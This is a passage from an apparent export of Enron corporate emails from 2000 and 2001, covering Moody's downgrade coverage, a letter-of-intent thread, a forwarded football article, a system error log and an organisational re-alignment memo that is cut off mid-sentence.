NEW YORK (AFX) - Moody's Investors Service said it has lowered the senior unsecured long-term debt ratings of Enron Corp from Baa1 to Baa2 following a deterioration in Enron's financial flexibility since the company announced significant writedowns as well as equity charges in previously undisclosed partnership investments._x000D_
The long-term debt ratings remain on review for further downgrade, Moody's said. _x000D_
Moody's also placed the company's Prime-2 rating for commercial paper on review for downgrade. _x000D_
Moody's initially placed Enron's long-term debt ratings on review on Oct 16. The write-downs and equity charges led to a substantial loss in investor confidence that has led to a more than halving of Enron's share price and difficulties in rolling over commercial paper, according to Moody's. _x000D_
In response to these events, Moody's said Enron has shored up its near-term liquidity position by drawing down on all of its committed revolving credit facilities and buying back its outstanding commercial paper, leaving the company with a net cash position of approximately 1.2 bln usd. _x000D_
Moody's said it plans to focus on management's success in lining up further liquidity support and on their ability to retain credit availability from their major counterparties. _x000D_
aw/gc For more information and to contact AFX: www.afxnews.com and www.afxpress.com_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
_x000D_
USA: Moody's cuts Enron to 2 notches above "junk"._x000D_
_x000D_
10/29/2001_x000D_
Reuters English News Service_x000D_
(C) Reuters Limited 2001._x000D_
_x000D_
NEW YORK, Oct 29 (Reuters) - Moody's Investors Service on Monday cut embattled energy trading giant Enron Corp.'s senior unsecured debt rating to two notches above junk status, and warned it may cut that rating again, as well as its rating for Enron's commercial paper. _x000D_
The rating agency cut Houston-based Enron's senior unsecured debt to "Baa2" from "Baa1," and said it may cut Enron's "Prime-2" commercial paper rating, which affects short-term debt. Its rating actions affect $13 billion._x000D_
Moody's said Enron is suffering from deteriorating financial flexibility since it announced big write-downs and equity charges from previously undisclosed partnership investments this month. This triggered "difficulties in rolling over commercial paper," Moody's said. _x000D_
Enron, which has about $63.4 billion in energy assets, said on Monday it is talking with banks to get more credit, after last week drawing down $3 billion from a bank credit line to buy back its outstanding commercial paper. _x000D_
Its shares traded Monday on the New York Stock Exchange at $13.75, down $1.75, or 11.3 percent. They have fallen 62 percent since Oct. 12, from $35.81. _x000D_
Rating agency, Standard &amp; Poor's, on Thursday revised its outlook for Enron's ratings to "negative" from "stable."_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
UK: Europe energy firms wary of Enron on credit worries._x000D_
By Stuart Penson_x000D_
_x000D_
10/29/2001_x000D_
Reuters English News Service_x000D_
(C) Reuters Limited 2001._x000D_
_x000D_
LONDON, Oct 29 (Reuters) - Energy companies in Europe are shying away from trading with troubled U.S. energy group Enron amid concerns about the company's credit status, industry sources said on Monday. _x000D_
Several large energy groups have frozen their dealings with Enron - one of Europe's biggest gas and power traders - as they hold urgent talks with the U.S. group about setting up new credit arrangements, the sources said._x000D_
"I think Enron's approach is to get the major counterparties back on board as quickly as possible and then hope the smaller ones will follow," said the head of risk management at one UK utility that halted its trade with Enron last week. _x000D_
"They are talking with us about bank letters of credit," he said. "The people that are still trading with them are doing so on a very restrictive basis." _x000D_
A spokesman for Enron's European headquarters in London headquarters declined to comment. _x000D_
Reluctance to trade with Enron in Europe comes as the company tries to rebuild investor confidence after its stock hit five-year lows. _x000D_
Triggering the slide was news last week the U.S. Securities and Exchange Commission is investigating huge losses relating to a private equity operation run by its former chief financial officer. _x000D_
Houston-based Enron trades a large amount of its volume in the U.S. and Europe through its Internet EnronOnline system. _x000D_
Last Friday the company said trade on EnronOnline was above average levels with more than 8,400 transactions at a notional value of approximately $4 billion. _x000D_
Traders said Enron's plight could hit liquidity in European gas and power markets, where liberalisation has unleashed rapid growth in energy trading in the last couple of years. _x000D_
One industry source cited a brokers list showing eight companies in the UK electricity market had put on hold their trading Enron, which is among the biggest five traders in the market. _x000D_
In mainland Europe, where Enron has been a major driver of liquidity, potential counterparties are treading with care. _x000D_
"We are avoiding them as counterparties - either by not trading with them or by using a 'sleeve' (a third party trader)," said a senior trader at one of Germany's big utilities, who declined to be named. _x000D_
French traders said wariness about dealing with Enron had dampened liquidity although Enron was still in the market on Monday morning. _x000D_
"Enron is a major player so counter parties are looking to see if there is a problem," said one French trader._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
_x000D_
BANDWIDTH BEAT: Enron Puts Spotlight Back On Broadband_x000D_
By Michael Rieke_x000D_
_x000D_
10/29/2001_x000D_
Dow Jones Energy Service_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
_x000D_
A Dow Jones Newswires Column _x000D_
_x000D_
HOUSTON -(Dow Jones)- Thanks to Enron Corp. (ENE), the broadband sector again looks like a place to make money._x000D_
But it won't be traders who will cash in on this new potential. It will be class-action attorneys. They're already lining up to sue Enron in at least five shareholder suits. _x000D_
As of Oct. 25, two of lawsuits had been filed against Enron in federal court and three more in Texas state court. Most of them name as defendants Ken Lay, Enron's longtime chairman, former Chief Executive Jeff Skilling and Andrew Fastow, Enron's chief financial officer until he was put on leave of absence Oct. 25. _x000D_
Still another suit, which isn't a class action suit, was filed naming as defendants members of Enron's board of directors. _x000D_
All the lawsuits concentrate on private investment partnerships Enron set up, many of them managed by Fastow. Most of the suits contend that it was a conflict of interest to have the Fastow partnerships doing complicated hedging transactions with Enron. _x000D_
The transactions named in the lawsuits involved billions of dollars of underperforming assets in broadband, water and other Enron investments. _x000D_
Fastow operated on both sides of some of those transactions. As Enron's chief financial officer, he was being paid to manage the corporation's finances. As general partner of two LJM partnerships, he managed the counterparties to billions of dollars of trades with Enron. He shared in profits of those partnerships. _x000D_
When investors began demanding information about the transactions, Enron's share price began to slide. With the heat on, Enron recently unwound the trades with the partnerships and booked $544 million related to losses from early termination of the deals, among other things. _x000D_
That's when the class action attorneys went to work. So far, at least 14 law firms are representing the plaintiffs. Enron didn't respond to calls asking about the lawsuits. _x000D_
Among the law firms representing plaintiffs is Milberg Weiss Bershad Hynes &amp; Lerach, which put out a news release announcing its lawsuit. The release points out that the firm has been responsible for recovering more than $30 billion from class action lawsuits. _x000D_
The lawsuits bring up questions about the bandwidth trading market. Some of the deals with the LJM partnerships run by Fastow "purportedly involved hedging transactions in the broadband market," according to Abrams and Franks v. Enron et al. _x000D_
That could tie into questions that have lingered in the bandwidth market for months. Market skeptics have said Enron and other energy companies are the only ones trading bandwidth. _x000D_
Enron has reported that it has been trading with a growing number of counterparties, a total of 120 in the second quarter of this year, according to Enron. _x000D_
Now market watchers will want to know if any of Enron's trades were done with the LJM partnerships managed by Fastow. _x000D_
They will also want to know how many bandwidth trades were done with Chewco Investments. That Houston company, according to a report in The Wall Street Journal, was managed by Michael Kopper and was set up in 1997 when Kopper was a managing director with Enron's Global Equity Markets Group. He left Enron earlier this year to work for partnerships run by Fastow. _x000D_
Do the plaintiffs' attorneys know whether Enron was trading bandwidth with any of those investment partnerships? _x000D_
"I think if is too early to tell," Thomas Bilek of Hoeffner &amp; Bilek told Bandwidth Beat. "As you know, (information) is coming out in drabs and dribbles from Enron." _x000D_
It could be several months before plaintiffs' attorneys get a chance to ask Enron officials those questions, Bilek said. _x000D_
It's also too early to tell what potential damages plaintiffs could win, said Steven Schulman, an attorney with Milberg Weiss. "At this point, you can only talk about it in terms of (shareholder) losses, and the losses are in the billions." _x000D_
Total losses will depend on the price each shareholder plaintiff paid for the stock and the price at which each shareholder later sold the stock. _x000D_
Enron's share price topped out between $90 and $91 in the summer of last year. It set a 52-week low Oct. 26 at $15.04. That spread leaves plenty of room for losses. _x000D_
Schulman told Bandwidth Beat that the record for losses in shareholder cases is $11 billion in a case involving Cendant Corp. (CD). Damages are usually a substantial portion of losses, Schulman said. _x000D_
"Whether (the Enron case) is bigger or less, I couldn't opine," he said. "This is a big case, by any means." _x000D_
-By Michael Rieke, Dow Jones Newswires; 713-547-9207; michael.rieke@dowjones.com_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 12 Nov 2001 11:15:11 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: LOI - Robert Chisholm</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Do I need to help you getting this out?_x000D_
 -----Original Message-----_x000D_
From: 	Greenberg, Mark  _x000D_
Sent:	Monday, November 12, 2001 1:02 PM_x000D_
To:	Hernandez, Lorie_x000D_
Cc:	Shults, Bob; Koehler, Anne C.; Jones, Tana; Carter, Carl_x000D_
Subject:	RE: LOI - Robert Chisholm_x000D_
_x000D_
Lorie -_x000D_
_x000D_
Sorry for the typo and misspellings.  I have reviewed the agreement again and made changes to Paragraphs 7 and 8.  I have attached the final version below.  _x000D_
_x000D_
As to getting this out today, that is fine.  Since I will need to initial the final letters, why don't we generate them up here and send them down for signature.  You can then attach the pricing and product description items._x000D_
_x000D_
Mark_x000D_
_x000D_
 &lt;&lt; File: loi-chisholm(11-12-01mlg).doc &gt;&gt; _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hernandez, Lorie  _x000D_
Sent:	Monday, November 12, 2001 10:37 AM_x000D_
To:	Greenberg, Mark; Carter, Carl_x000D_
Cc:	Shults, Bob; Koehler, Anne C.; Jones, Tana_x000D_
Subject:	RE: LOI - Robert Chisholm_x000D_
_x000D_
Mark,_x000D_
_x000D_
Hope you had a good weekend and thanks for the quick response._x000D_
_x000D_
There were a few misspellings of names and a typo which we have changed.  The only question I have is in paragraphs 7 &amp; 8, we still refer to a Term Sheet, should this be changed to Product Description? please advise.  _x000D_
_x000D_
 &lt;&lt; File: loi-chisholm(11-12-01).doc &gt;&gt;  _x000D_
Let me know if you have any problems with us sending out a letter today.  Thanks._x000D_
_x000D_
_x000D_
Make It A Great Day!!_x000D_
_x000D_
Lorie E. Hernandez_x000D_
Specialist - E-Commerce_x000D_
Transaction Development_x000D_
713.853.6283_x000D_
lorie.hernandez@enron.com_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Greenberg, Mark  _x000D_
Sent:	Friday, November 09, 2001 3:33 PM_x000D_
To:	Hernandez, Lorie; Carter, Carl_x000D_
Cc:	Shults, Bob; Koehler, Anne C.; Jones, Tana_x000D_
Subject:	LOI - Robert Chisholm_x000D_
_x000D_
Lorie/Carl -_x000D_
_x000D_
Pursuant to our discussion, I have attached an updated draft of the LOI.  I have not attached either the product description nor the pricing schedule as this can be accomplished once we finalize the LOI._x000D_
_x000D_
Please take look at the attached and let me know if there are any further comments or questions._x000D_
_x000D_
Mark_x000D_
_x000D_
 &lt;&lt; File: loi-chisholm(11-09-01).doc &gt;&gt; </t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 01:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'matt.wilson@weyerhaeuser.com', 'yasu_neupdx@hotmail.com', 'dpraisl@buckman.com', 'jones@mca-architects.com', 'cbush@amgen.com', 'doug.skordal@nike.com', 'mark.guzman@enron.com', 'marysvillegolf@earthlink.net', 'sjbikes@hotmail.com', 'kiddmyers@aol.com', 'entrup_william@lilly.com', 'stephan.dillon@weyerhaeuser.com', 'matt.hsu@interwoven.com', 'malinlf@ix.netcom.com', 'dquillen@aracnet.com', 'chris@dahlelectric.com'})</t>
  </si>
  <si>
    <t>Fiesta Bowl</t>
  </si>
  <si>
    <t>Beavers make plans to invade Arizona_x000D_
     Associated Press_x000D_
_x000D_
     TEMPE, Ariz. -- Oregon State capped its remarkable emergence from more_x000D_
than a_x000D_
     quarter-century of football ineptitude by accepting an invitation to_x000D_
play Notre Dame in the Jan. 1_x000D_
     Fiesta Bowl._x000D_
_x000D_
     The Beavers were the top choice of the Fiesta Bowl selection committee_x000D_
because they were "a_x000D_
     conference co-champion, a 10-win team and an incredible turnaround_x000D_
story that somewhat mirrors_x000D_
     what Kansas State has done," Fiesta Bowl president John Junker said._x000D_
_x000D_
     "For us to come here from where we were three years go, to go 10-1, and_x000D_
being in the Fiesta_x000D_
     Bowl against Notre Dame is a great story," Oregon State coach Dennis_x000D_
Erickson said Sunday._x000D_
_x000D_
     As Oregon State's opponent, Virginia Tech had a higher ranking and_x000D_
better record, but the Fiesta_x000D_
     could not resist the Irish (9-2) and their huge nationwide following,_x000D_
even though Notre Dame was_x000D_
     ranked only 11th in the final Bowl Championship Series standings._x000D_
Oregon State is sixth._x000D_
_x000D_
     It will be a matchup of teams that weren't even in the top 25 in the_x000D_
preseason._x000D_
_x000D_
     "I don't think any of us in our wildest imagination would have thought_x000D_
this would have been the_x000D_
     matchup," Junker said._x000D_
_x000D_
     Notre Dame won its last seven games to become bowl eligible at 9-2._x000D_
_x000D_
     The Fiesta considered Miami but decided the Notre Dame-Oregon State_x000D_
matchup was more_x000D_
     intriguing, and that the Hurricanes were a better fit against Florida_x000D_
in the Sugar Bowl._x000D_
_x000D_
     Fiesta Bowl officials maintained that comments last week by Pac-10_x000D_
commissioner Tom Hansen_x000D_
     had no impact on their decision. He suggested the conference should_x000D_
pull out of the BCS if_x000D_
     Oregon State was left out of the Fiesta Bowl._x000D_
_x000D_
     "We selected Oregon State because they deserved it and won it on the_x000D_
field of battle," Junker_x000D_
     said._x000D_
_x000D_
     The Fiesta Bowl normally gives an automatic berth to the Big 12_x000D_
champion, but it had two at-large_x000D_
     picks this year because Oklahoma will play Florida State for the_x000D_
national championship in the_x000D_
     Orange Bowl._x000D_
_x000D_
     Oregon State set an NCAA record for futility with 28 consecutive losing_x000D_
seasons, a streak broken_x000D_
     when the Beavers went 6-5 last year in Erickson's first season and lost_x000D_
to Hawaii in the Oahu_x000D_
     Bowl._x000D_
_x000D_
     This year, Oregon State tied Washington and Oregon for the Pac-10_x000D_
title, their first since 1964._x000D_
     That team, coached by Tommy Prothro, lost to Michigan in the Rose Bowl._x000D_
A 35-year bowl_x000D_
     drought followed._x000D_
_x000D_
     Notre Dame, by contrast, is a regular at major bowls. Its last_x000D_
appearance in one of the big-four_x000D_
     bowls was in 1996, the Orange Bowl. But this Irish team was not_x000D_
expected to get this far,_x000D_
     especially after a 2-2 start. There was widespread speculation then_x000D_
that coach Bob Davie would_x000D_
     be out of a job when the season ended._x000D_
_x000D_
     Davie did not want to talk about vindication._x000D_
_x000D_
     "I think so much attention is always placed on the head coach, and I'm_x000D_
sure Dennis would agree_x000D_
     with me. This isn't about us. This is about our football players and_x000D_
our assistant coaches who put_x000D_
     so much into this._x000D_
_x000D_
     "That was a little bit overrated before the season and it's a little_x000D_
bit overrated now. This certainly_x000D_
     isn't about me."_x000D_
_x000D_
     Each team will receive $12 million to $13 million. Oregon State will_x000D_
split the money with the rest_x000D_
     of the Pac-10, but Notre Dame, as an independent, keeps it all. No_x000D_
wonder Davie was so anxious_x000D_
     as he watched the Oklahoma-Kansas State game, knowing that a K-State_x000D_
victory could have sent_x000D_
     Notre Dame to a much lesser holiday payday._x000D_
_x000D_
     "It was brutal," he said. "As good as Oklahoma is, and as well coached_x000D_
as they are, I almost_x000D_
     went crazy when it was fourth-and-1 and they were in that shotgun for_x000D_
that draw, but they know_x000D_
     what they're doing. It was painful watching that game."_x000D_
_x000D_
     Junker said Oregon State officials have promised 30,000 or more fans_x000D_
will come to the desert from_x000D_
     the Northwest for the game. Add to that Notre Dame's unparalleled_x000D_
national following, and the_x000D_
     Fiesta already has been declared a sellout. Each school will receive_x000D_
15,000 tickets._x000D_
_x000D_
     Beaver players like the idea of playing Notre Dame._x000D_
_x000D_
     "I didn't like them growing up," running back Ken Simonton said. "I_x000D_
don't like 'America's teams.' I_x000D_
     don't like everybody's favorite. I was always an underdog."_x000D_
_x000D_
_x000D_
Marc_x000D_
*(303)401-7054_x000D_
*mleslie@amgen.com</t>
  </si>
  <si>
    <t>Thu, 4 Oct 2001 14:57:49 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Sitara</t>
  </si>
  <si>
    <t xml:space="preserve">I think you will have to log off.  I approved the request.  Look at the status of your request and see if it says final approved.  If it does than try logging off and trying again.  Thanks._x000D_
PL_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Simpson, James  _x000D_
Sent:	Thursday, October 04, 2001 4:39 PM_x000D_
To:	Love, Phillip M._x000D_
Subject:	Sitara_x000D_
_x000D_
Phillip,_x000D_
_x000D_
I tried Sitara out.  Do I need to log off to get the sitara updates?  Or is that a different group I need to contact??_x000D_
_x000D_
Thanks_x000D_
Jim_x000D_
_x000D_
I'll come by tomorrow, if you have time, for a TDS lesson._x000D_
</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 07:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/2/01; HourAhead hour: 13;  HourAhead schedule download failed. _x000D_
Manual intervention required._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001040213.txt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Error: dbCaps97Data: Cannot perform this operation on a closed database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Error: dbCaps97Data: Cannot perform this operation on a closed database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Error: dbCaps97Data: Cannot perform this operation on a closed database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Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
!!!An error occurred while attempting to initialize the Borland Database _x000D_
Engine (error $2A04)_x000D_
!!!An error occurred while attempting to initialize the Borland Database _x000D_
Engine (error $2A04)_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
!!!An error occurred while attempting to initialize the Borland Database _x000D_
Engine (error $2A04)_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
!!!An error occurred while attempting to initialize the Borland Database _x000D_
Engine (error $2A04)_x000D_
Error: Crawler lifetime exceeded._x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
!!!An error occurred while attempting to initialize the Borland Database _x000D_
Engine (error $2A04)_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database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Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
!!!An error occurred while attempting to initialize the Borland Database _x000D_
Engine (error $2A04)_x000D_
!!!An error occurred while attempting to initialize the Borland Database _x000D_
Engine (error $2A04)_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database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Error: dbCaps97Data: Cannot perform this operation on a closed database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Error: dbCaps97Data: Cannot perform this operation on a closed database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Error: dbCaps97Data: Cannot perform this operation on a closed database</t>
  </si>
  <si>
    <t>Tue, 9 Oct 2001 08:53:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>I just found a taker. Sorry._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Allen, Margaret  _x000D_
Sent:	Tuesday, October 09, 2001 10:50 AM_x000D_
To:	Arnold, John_x000D_
Subject:	RE: _x000D_
_x000D_
He can't go - I didn't think he could. I'm trying to find my sister (she just moved to town), but I can't find her anywhere. Any other suggestions?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Arnold, John  _x000D_
Sent:	Tuesday, October 09, 2001 10:45 AM_x000D_
To:	Allen, Margaret_x000D_
Subject:	RE: _x000D_
_x000D_
yea_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Allen, Margaret  _x000D_
Sent:	Tuesday, October 09, 2001 10:39 AM_x000D_
To:	Arnold, John_x000D_
Subject:	RE: _x000D_
_x000D_
I don't think Brian can go - but can I extend the offer to him? _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Arnold, John  _x000D_
Sent:	Tuesday, October 09, 2001 10:37 AM_x000D_
To:	Allen, Margaret_x000D_
Subject:	RE: _x000D_
_x000D_
I've 2 extra tix if you anybody we like._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Allen, Margaret  _x000D_
Sent:	Tuesday, October 09, 2001 10:36 AM_x000D_
To:	Arnold, John_x000D_
Subject:	RE: _x000D_
_x000D_
I'm here - my 11 got cancelled. _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Arnold, John  _x000D_
Sent:	Tuesday, October 09, 2001 10:34 AM_x000D_
To:	Allen, Margaret_x000D_
Subject:	_x000D_
_x000D_
are you there?</t>
  </si>
  <si>
    <t>Wed, 20 Dec 2000 18:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re-Alignment</t>
  </si>
  <si>
    <t>Thanks to all of you, Enron North America has had an outstanding year in=20_x000D_
2000.  Some of the more notable accomplishments include:_x000D_
a) 100% plus increase in EBIT from 1999 actuals to 2000 forecast;_x000D_
b) significant rationalization of the balance sheet including the sale of t=_x000D_
he=20_x000D_
(i) Wind River/Powder River gathering assets, (ii) East Coast Power=20_x000D_
generating assets, (iii) HPL and (iv) five of the six Eastern Peakers;_x000D_
c) ENA is the leading energy merchant by a factor of two;_x000D_
d) physical electricity volume grew by 34% YTD 1999 to YTD 2000 forecast;_x000D_
e) natural gas volumes grew by 82% YTD 1999 to YTD 2000 forecast;_x000D_
f) 500% growth in daily transactions from November 1999 to November 2000 du=_x000D_
e=20_x000D_
to the highly successful Enron OnLine distribution channel; and_x000D_
g) ENA reaching its 25% ROCE target._x000D_
_x000D_
These are truly outstanding accomplishments and our expectations for growth=_x000D_
=20_x000D_
and opportunity in Enron North America for 2001 are consistent with that=20_x000D_
success.  In order to reach these goals, we felt it necessary to re-align a=_x000D_
=20_x000D_
number of our organizations. A number of these changes are completed.  The=_x000D_
=20_x000D_
goals of such re-alignment include:_x000D_
a) increase overall productivity with the goal to ensure that every employe=_x000D_
e=20_x000D_
is in a position to contribute regardless of skill set;_x000D_
b) increase overall market coverage, deal flow and information generation=_x000D_
=20_x000D_
with the goal to increase bid/offer income, increase the velocity of deal=_x000D_
=20_x000D_
flow, improve customer coverage and promote quality information transfer to=_x000D_
=20_x000D_
our trading organization;_x000D_
c) increase deal quality and earnings quality with the goal to (i) allocate=_x000D_
=20_x000D_
our resources towards the best transactions and (ii) significantly increase=_x000D_
=20_x000D_
our =01&amp;mid-market=018 originated transactions in our portfolio;_x000D_
d) promote real time decision making and a closer tie between our trading a=_x000D_
nd=20_x000D_
origination (mid-market and structured) organizations in order to better=20_x000D_
align those functions to reduce the amount of un-productive internal focus;_x000D_
e) increase the overall velocity of the capital being utilized consistent=_x000D_
=20_x000D_
with our goal of a 25% plus return on capital employed; and_x000D_
f) identify and recognize a host of new leaders in the organization that ar=_x000D_
e=20_x000D_
critical to meeting our goals next year._x000D_
_x000D_
With these objectives in mind, patterned after the successful business mode=_x000D_
ls=20_x000D_
in Calgary and Portland, effective immediately the following changes are=20_x000D_
being implemented:_x000D_
a) East Power =01) a single East Power Team incorporating trading, mid-mark=_x000D_
et=20_x000D_
and origination will be formed under the co-leadership of Kevin Presto and=_x000D_
=20_x000D_
Janet Dietrich who will report to the Enron Americas - Office of the Chairm=_x000D_
an=20_x000D_
(EA OOC).  This team will have one income statement, one book and a joint=_x000D_
=20_x000D_
accountability. However, a clear delineation of responsibilities inside the=_x000D_
se=20_x000D_
teams will continue to exist in which the trading organization will manage=_x000D_
=20_x000D_
the risk, income statement and product development aspects of the=20_x000D_
partnership. The originators will have the primary responsibility to genera=_x000D_
te=20_x000D_
origination income, provide coverage, deal flow, lead strategy formulation,=_x000D_
=20_x000D_
provide information and generate strategic positions.  Overall, the team wi=_x000D_
ll=20_x000D_
be rewarded based upon increasing the value of the book, meeting=20_x000D_
coverage/deal flow targets and meeting its strategic/growth goals in the=20_x000D_
Eastern power markets. The team will be responsible for covering the IOU=01=_x000D_
,s,=20_x000D_
muni=01,s/co-ops, industrials and IPP=01,s and will utilize all ENA=01,s pr=_x000D_
oduct=20_x000D_
capabilities including the power commodity, assets and capital. The team wi=_x000D_
ll=20_x000D_
further be broken down into several key strategic regions and business unit=_x000D_
s=20_x000D_
including:=20_x000D_
  (i) ERCOT =01) managed by Doug Gilbert Smith and Bruce Sukaly;_x000D_
  (ii) NE =01) managed by Dana Davis and Jeff Ader;_x000D_
  (iii) Midwest =01) managed by Fletch Sturm and Ed Baughman;_x000D_
  (iv) SE =01) managed by Rogers Herndon and Ozzie Pagan;_x000D_
  (v) East Power Development =01) managed by Ben Jacoby;_x000D_
  (vi) East Power Structuring  - managed by Bernie Aucoin; and_x000D_
  (vii) East Power Fundamentals and the =01&amp;Genco=018 =01) managed by Lloyd=_x000D_
 Will_x000D_
  =20_x000D_
b) West Power =01) there will be no changes to the Portland office which is=_x000D_
=20_x000D_
managed by Tim Belden and Chris Calger .  Both Tim and Chris will continue =_x000D_
to=20_x000D_
report to the EA OOC._x000D_
c) Canada and Mexico =01) there will be no changes to the Canadian or Mexic=_x000D_
an=20_x000D_
offices which are managed by Rob Milnthorp and Max Yzaguirre respectively. =_x000D_
=20_x000D_
Both Rob and Max will continue to report to the EA OOC._x000D_
d) U.S. Natural Gas =01) there are several changes anticipated in this busi=_x000D_
ness=20_x000D_
consistent with the goals and objectives described above. The changes=20_x000D_
primarily affect the East, Central, West and Texas gas regions. Each region=_x000D_
=20_x000D_
will consist of a single gas team incorporating trading, mid-market and=20_x000D_
origination. Each team will have one income statement, one book and a joint=_x000D_
=20_x000D_
accountability. However, a clear delineation of responsibilities inside the=_x000D_
se=20_x000D_
teams will continue to exist in which the trading organization will manage=_x000D_
=20_x000D_
the risk, income statement and product development aspects of the=20_x000D_
partnership. The originators will have the primary responsibility to genera=_x000D_
te=20_x000D_
origination income, provide coverage, deal flow, lead strategy formulation,=_x000D_
=20_x000D_
provide information and generate strategic positions. Overall, the team wil=_x000D_
l=20_x000D_
be rewarded based upon increasing the value of the book, meeting=20_x000D_
coverage/deal flow targets and meeting its strategic/growth goals in the=20_x000D_
Eastern, Western, Central and Texas gas markets.  The team will be=20_x000D_
responsible for covering the LDC=01,s, muni=01,s/co-ops, industrials, IOU=_x000D_
=01,s, IPP=01,s=20_x000D_
and the producers.  There will be an increasing focus on the upstream side =_x000D_
of=20_x000D_
the business including the producers, transporters and storage providers in=_x000D_
=20_x000D_
addition to market area opportunities. The team will utilize all of ENA=01,=_x000D_
s=20_x000D_
product capabilities including the gas commodity, assets and capital. Each =_x000D_
of=20_x000D_
these groups will report directly to the EA OOC;_x000D_
East Gas =01) a single East Gas Team incorporating trading, mid-market and=_x000D_
=20_x000D_
origination will be formed under the co-leadership of Scott Neal and Frank=_x000D_
=20_x000D_
Vickers who will be returning from Portland to join this team. =20_x000D_
West Gas  =01) in a similar manner, a West Gas Team will be formed co-manag=_x000D_
ed by=20_x000D_
Phillip Allen and Barry Tycholiz, who will be joining us in Houston from th=_x000D_
e=20_x000D_
Canadian team. The Denver office under Mark Whitt will be integrated under=_x000D_
=20_x000D_
this team._x000D_
Central Gas =01)  in a similar manner, a Central Gas Team will be formed=20_x000D_
co-managed by Hunter Shively and Laura Luce. The Chicago office will be=20_x000D_
integrated into this team._x000D_
Texas Gas =01) the Texas Gas Team will be managed by Tom Martin. This team =_x000D_
will=20_x000D_
continue to manage the gas trading business around HPL until the pending sa=_x000D_
le=20_x000D_
is concluded in Q2 2001.  After the sale of HPL, this team will build a Tex=_x000D_
as=20_x000D_
gas business without ownership of the HPL assets. =20_x000D_
Financial =01) this group will continue to be managed by John Arnold with n=_x000D_
o=20_x000D_
significant changes._x000D_
Derivatives =01) this group, lead by Fred Lagrasta, will offer derivative a=_x000D_
nd=20_x000D_
financial mid-market products and services to the natural gas market=20_x000D_
specifically targeting CFO=01,s and treasury departments.  Fred will contin=_x000D_
ue to=20_x000D_
maintain certain existing mid-market accounts with a number of producer and=_x000D_
=20_x000D_
industrial accounts where relationships are well formed. Otherwise,=20_x000D_
mid-market coverage will gravitate to the regions. The New York office gas=_x000D_
=20_x000D_
marketing efforts will continue to be managed by Fred._x000D_
Upstream Products =01) this group, lead by Jean Mrha, will develop several=_x000D_
=20_x000D_
distinct product offerings for the upstream segment of the gas market.  Thi=_x000D_
s=20_x000D_
group will develop and market the product in conjunction with the regions.=_x000D_
=20_x000D_
This is consistent with our desire to have a broader product offering and=_x000D_
=20_x000D_
greater market penetration in the upstream segment.  These products include=_x000D_
=20_x000D_
producer outsourcing, similar to our successful Petro-Canada and Suncor=20_x000D_
relationships in Canada, physical storage re-engineering, compressor=20_x000D_
services, wellhead liquidity products and offshore asset and capital=20_x000D_
products.  In addition, Jean will manage our Bridgeline joint venture with=_x000D_
=20_x000D_
Texaco. =20_x000D_
Gas Structuring =01) this group will be lead by Ed McMichael, reporting to =_x000D_
Frank=20_x000D_
Vickers, will provide structuring and deal support to all the gas teams._x000D_
Gas Fundamentals =01) this group will be lead by Chris Gaskill, reporting t=_x000D_
o=20_x000D_
Hunter Shively, will provide fundamentals to all the gas teams.   =20_x000D_
_x000D_
Julie Gomez will continue to support the gas floor through several identifi=_x000D_
ed=20_x000D_
projects including long-term supply/demand analysis and, natural gas=20_x000D_
transportation capacity trading opportunities._x000D_
=20_x000D_
There is an expectation of some customer overlap between the gas and power=_x000D_
=20_x000D_
groups; for example, the combination utilities and the IPP=01,s.  The teams=_x000D_
 will=20_x000D_
coordinate with regard to the combination utilities like Con. Edison or=20_x000D_
PG&amp;E.  With regard to the IPP=01,s, to the extent that the product offering=_x000D_
=20_x000D_
involves an underlying power position, the power teams will manage. We have=_x000D_
=20_x000D_
asked Janet Dietrich to coordinate such overlaps between the two=20_x000D_
organizations in Houston.=20_x000D_
_x000D_
e) Technical/Restructuring - In the effort to consolidate and centralize ou=_x000D_
r=20_x000D_
technical resources (engineering, development, operations, pipeline) to=20_x000D_
ensure that this skill base is available to all ENA groups and utilized=20_x000D_
productively across the organization, Brian Redmond will form and manage th=_x000D_
e=20_x000D_
Technical Services Group.  This group will manage ENA=01,s technical risks =_x000D_
and=20_x000D_
will provide, on a cost basis, technical services for the entire ENA=20_x000D_
organization. This group will manage the interface with EE&amp;CC and OEC.  In=_x000D_
=20_x000D_
